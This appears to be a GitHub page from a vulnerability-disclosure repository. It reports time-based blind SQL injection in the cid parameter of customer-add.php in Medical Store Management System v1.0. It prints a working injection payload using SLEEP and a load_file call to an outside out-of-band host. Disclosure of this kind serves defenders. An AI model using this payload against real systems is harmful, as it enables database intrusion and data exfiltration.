Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/abhisheks008/2022/Medical-Store-Management-System/
CVE-nu11secur1ty/vendors/abhisheks008/2022/Medical-Store-Management-System/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
PoC
 
 
 
 

Medical-Store-Management-System

Vendor

Description:

The cid parameter from customer-add.php app on Medical Store Management System v1.0 appears to be vulnerable to SQL injection attacks. The application took 20034 milliseconds to respond to the request, compared with 36 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The malicious actor can take control of the system administrator accounts of this system! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!

Status: CRITICAL

[+] Payloads:

---
Parameter: cid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cid=987101' AND (SELECT 7784 FROM (SELECT(SLEEP(3)))HbQW) AND 'yDXs'='yDXs&cfname=Safia&clname=Malik&age=22'+(select load_file('\\\\ej12det210osu6x32wsqrnyu6lce080wrzfr2kq9.https://github.com/abhisheks008/Medical-Store-Management-System\\tah'))+'&sex=Female&phno=9632587415&emid=safia@gmail.com&update=Update
---

OMG

Reproduce:

href

Proof and Exploit:

href